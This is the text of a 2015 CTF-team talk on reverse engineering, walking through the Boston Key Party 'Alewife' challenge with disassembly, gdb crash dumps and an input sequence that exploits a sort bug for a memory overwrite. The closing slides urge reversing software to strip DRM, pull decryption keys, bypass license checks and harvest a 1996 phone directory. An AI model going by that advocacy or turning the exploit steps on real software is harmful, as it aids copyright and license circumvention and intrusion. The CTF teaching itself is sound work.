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Reverse Engineering or Making Corporations Cry

by Javantea aka. Joel R. Voss
Mar 26, 2015
For a talk at UW Batman's Kitchen CTF team April 8, 2015
Video (Unfortunately due to technical difficulty there is no audio for this. An audio track will be added in the future but until then apologies.)

My PGP key fingerprint is at the top of every slide. Write it down so that you can sign it later. Secure encryption allows us to communicate privately. If you think we don't need to communicate privately, please zip the contents of your inbox, seed a torrent, and post the magnet to pastebin press release style.

This talk uses strong language because it is necessary to convey the seriousness of this issue. If you are going to be offended, stop now and learn to not be offended.

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Reverse Engineering - Prerequisites

JavRE can be downloaded here (get the git version):

If you don't know this, you need to learn234. This talk is for hackers and programmers.

If your friends are forcing you to watch this talk and you don't understand anything, let me suggest reading my DNSSEC research which is much more accessible.

If you're looking for a much easier tutorial on reverse engineering using JavRE, check out the "Get Started" link on JavRE.


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Reverse Engineering - The Goal

If you think you can do it, go for it. If you hear someone shout out "I got it", that's probably them solving the challenge. It took Falcon and I about 10 hours to solve this1, but you have the solutions available to you.

1 We didn't get points because I had other obligations that required my attention.

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Understanding the Problem

Everyone wants to know where to start.

  1. Hack easy things that are slightly beyond your skill level. ← Most important.
  2. Read many articles.
  3. Support reverse engineers in every case.
  4. Join a reverse engineering community.
  5. Learn why Cory Doctorow thinks that there is a war against General Purpose Computing.1
  6. Reverse Engineer Games.
  1. Start with Google.


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Why The Fuck?

Corporations use obfuscation to stop you from doing what you want to do.

Why should corporate greed decide what you do?

Fuck corporations.

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Binary patching

okteta hex editor Patch the binary if you are going to do dynamic reversing and your target uses anti-debugging.
    Use a hex editor.

The two most common anti-debugging techniques in Linux CTF challenges are:

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Enter Alewife

Let's talk about Boston Key Party.

When you have a problem where they are brash enough to not put in obfuscation or anti-debugging, they mean that they have put a bug deep into their system that they wish you to exploit. This applies to the real world as well.

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Aside: System Stability

The reason I use Linux instead of Mac OSX or Windows is fairly complex. It's mainly a question of stability and code quality. The code quality of operating systems based on Linux is surprisingly high in comparison to its competitors.

Microsoft does not fix bugs in its programs when people report them. No open source software with a valid maintainer would act this way. If you're this far, you are probably ready to use Linux full time.

Abandon Microsoft.

It just happens to make it possible to run CTF challenges without using a virtual machine. This makes the system of dynamic reverse engineering that much easier. Take care though because using this method to reverse engineer sophisticated malware or untrusted software may result in the compromise of your system. How do you make good choices about this? Do you think the program has the capability of exploiting a vulnerability in your system?

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The First of N Shells

What about these shells?

You affect memory via the array program.

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The Second of N Shells

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The Third of N Shells

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The Fourth of N Shells

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The Fifth of N Shells

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The Sixth of N Shells

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The Seventh of N Shells

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The Eighth of N Shells

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The Ninth of N Shells

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The Rest of the N Shells

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The commands that make up the exploit

# Create a new big buffer.
1 1
# Get to the asterisk shell (the fourth shell)
1 2 x
# Fill the big buffer with 200 junk values.
1 200
3123 3123 3123 3123 3123 3123 ...

# Convert big array to short array.
1 5 x 2
# Sort the array (vulnerable).
2 2 x 3
# Remove one integer from the full array.
2 2 x 4
# Write one 8-byte integer (the value that goes at that address).
2 2 x 1 1 value
# Run the print function that we have just overwritten with puts.
2 4 x
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The Last of N Shells

It turns out that one of these shells has a vulnerability. How did we find it? We just mucked around until it crashed. This is one of the cardinal rules of hacking:

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401421 in ?? ()
(gdb) bt
#0  0x0000000000401421 in ?? ()
#1  0x0000000000401994 in ?? ()
#2  0x00007ffff7a59db5 in __libc_start_main (main=0x4017e1, argc=1, argv=0x7fffffffe658, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe648) at libc-start.c:285
#3  0x0000000000400839 in ?? ()
(gdb) x/i $rip
=> 0x401421:    mov    %rax,(%rbx)
(gdb) i r rax
rax            0x9988776655443322       -7383520307673025758
(gdb) i r rbx
rbx            0x4141414142424242       4702111234491826754

It's super effective! So now that you can overwrite 8 bytes, how do you get your remote code execution?

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Test, test, test

Programming and hacking require testing. If you don't test, you are hobbling yourself. Test!
Sometimes you have enough to make it work on the first try.
Sometimes you end up automating gcc so that you can make it work.

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Reverse Engineering Alewife

Static Reverse Engineering with JavRE

python javre/ -v array >array.jav

Step 1: Find where you want to start reversing.
If you know what's going on, start there, go to step 4.
If you don't know what's going on, start at entry point.

objdump -x array
start address 0x0000000000400810

Easy enough?

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Reverse Engineering Alewife

Step 2: Find main()
If you have a normal libc, the entry looks like this:

  40081f: MOV R8, 0x402390 ; 
  400826: MOV RCX, 0x402320 ; 
  40082d: MOV RDI, 0x4017e1 ; main()
  400834: CALL 400780 <__libc_start_main>
  400839: HLT ; 

libc_start_main is a simple function that calls main().
See there, it's the first argument to libc_start main.
The first argument of a function call goes into RDI on x86-64.

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Reverse Engineering Alewife

Step 3: Label this function()
Easy enough, name it so that you can understand functions that call it.

int main(int argc, char **argv)
	// ... code here ...
	return 0;
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Reverse Engineering Alewife

Step 4: Find out what's going on by looking at calls.
Note any calls that main() makes.
On 401804 you should see a call to write.
write() is a C function.
It's pretty obvious what's going on here.
On 40180e you see a call to an unnamed function.
This is less obvious, but the argument is obviously ": ".
Take a guess at what it does.

  4017f0: MOV EDX, 0xa ; '\n'
  4017f5: MOV ESI, 0x40242e ; 'Array Ops\n'
  4017fa: MOV EDI, 0x1 ; '\x01'
  4017ff: MOV EAX, 0x0 ; EAX = 0x0; 
  ; write(STDOUT_FILENO, "Array Ops\n", 10);
  401804: CALL 400720 <write>
  401809: MOV EDI, 0x402439 ; ': '
  ; input_getter(": ");
  40180e: CALL 400906 <input_getter>

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Reverse Engineering Alewife

Step 5: Take a look at the if statements below.
The if statements are deciding how the program works.
Go to step 3.
This is all we had to reverse engineer to find the shells and the vulnerability.

  401813: MOV [RBP-0x1], AL ; [RBP-0x1] = AL; 
  401816: MOVZX EAX, BYTE [RBP-0x1] ; EAX = RBP-0x1[0]
  40181a: CMP EAX, 0x2 ;
  40181d: JZ 0x401957 ; if(EAX != 0x2) {
  401823: CMP EAX, 0x2 ;
  401826: JG 0x401832 ; if(EAX <= 0x2) {
  401828: CMP EAX, 0x1 ;
  40182b: JZ 0x401849 ; if(EAX != 0x1) {
  40182d: JMP 0x401ab2 ; goto 
; }

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Reverse Engineering Alewife

Step 6: Find out what the function does, label it, and grab any keys.
At this point you need to understand what is going on.
In alewife, we find the shells.
We took a look at each function to make sure there weren't any obvious vulnerabilities.
We found nothing but innocent crashes.

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Reverse Engineering Alewife

Step 7: Use dynamic reversing
Crash the program and look at the way it crashes in gdb.
This takes time, but remember that the more you learn about GDB, the better a programmer you'll become.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401421 in ?? ()
(gdb) bt
#0  0x0000000000401421 in ?? ()
#1  0x0000000000401994 in ?? ()
#2  0x00007ffff7a59db5 in __libc_start_main (main=0x4017e1, argc=1, argv=0x7fffffffe658, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe648) at libc-start.c:285
#3  0x0000000000400839 in ?? ()
(gdb) x/i $rip
=> 0x401421:    mov    %rax,(%rbx)
(gdb) i r rax
rax            0x9988776655443322       -7383520307673025758
(gdb) i r rbx
rbx            0x4141414142424242       4702111234491826754
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Reverse Engineering Alewife

Step 8: Write a program to automatically exploit the vulns.
Exploit the program, get remote code execution.
This can't be done easily by hand, but it can be done.

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Finding the Vulnerability - Injection

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Memory corruption

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Finding that Memory Corruption

  1. Try everything
  2. No really, try everything.

Hack _ALL_ The Things!

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How does this talk have anything to do with corporations?

Once you've gotten code execution on Alewife, you know what you need to know to reverse engineer proprietary corporate software.

  1. Video drivers getting you down? Reverse the driver, get the code to write your own.
  2. DRM getting in the way of your enjoyment? Reverse a movie player, get the key, get the content.
  3. New HTML5 DRM sound like a bad deal? Reverse the binary, get the key, get the content.
  4. Books that you download from the library have DRM? Reverse the viewer, get the key, get the content.
  5. Music you bought from Apple crippled by DRM? Reverse iTunes, get the key, get the content.
  6. New phone you want is locked to a carrier you don't want? Reverse the apps, find a vuln, exploit, get root, jailbreak.
  7. CAD software you bought requires you to renew your license every year? Not anymore, reverse it, nop out the part where it stops you from using it, continue building.
  8. Irrational and Looking Glass Studios "lost" the source code they wrote so they can't port System Shock 2 to Linux and Mac OSX. Reverse it and play it natively on your platform of choice.
  9. The Yellow Pages released a CD with software that allows you to look up anyone's phone number and address from 1996. Reverse it, now you have a list of everyone who was in the phone book in 1996.
  10. Video game too hard? Reverse it, make it easier, have fun.

Does that sound like too much work when you could just pirate the content instead? Of course it does. But if you actually want to pay for the content you consume, reverse engineering makes it possible for you to enjoy your content as much as a pirate enjoys their content. And remember: hack it once and everyone gets all the content. If someone reverse engineers a piece of software and releases the tool, everyone benefits, even those who didn't reverse engineer the software.

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This talk:
The paper:
I am Javantea, I've been hacking for 12 years. I no longer work in the security industry. I've dedicated my life to science and promotion of philosophy and logic. I still have fun.
Greetz: Falcon, Neg9, h0tb0x, Melody, enferex, the Black Lodge, Ada's Technical Bookstore, Hushcon, Toorcon, and Leviathan Security

This talk wouldn't wouldn't have happened if not for the dedication of a small group of people and the community at large. Support your local hackers.

I am also willing to take any questions listeners have about my latest publications:
CSRF in Realms Wiki
Remote Code Execution in Realms Wiki
Enumerating DNSSEC NSEC and NSEC3 Records

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A short PSA

The NSA has been spying on American people and the world for years. They've been hacking world leaders and random people alike with no respect for justice. They aren't making us safer, they're making us less safe. It's our duty to remove this unwarranted wiretap from the NSA and the backdoors they've put into our hardware. If we don't stop them from snooping and hacking us one way or another, they're going to make dissent impossible.

Resistance against a tyrannical government is the duty of every patriot.

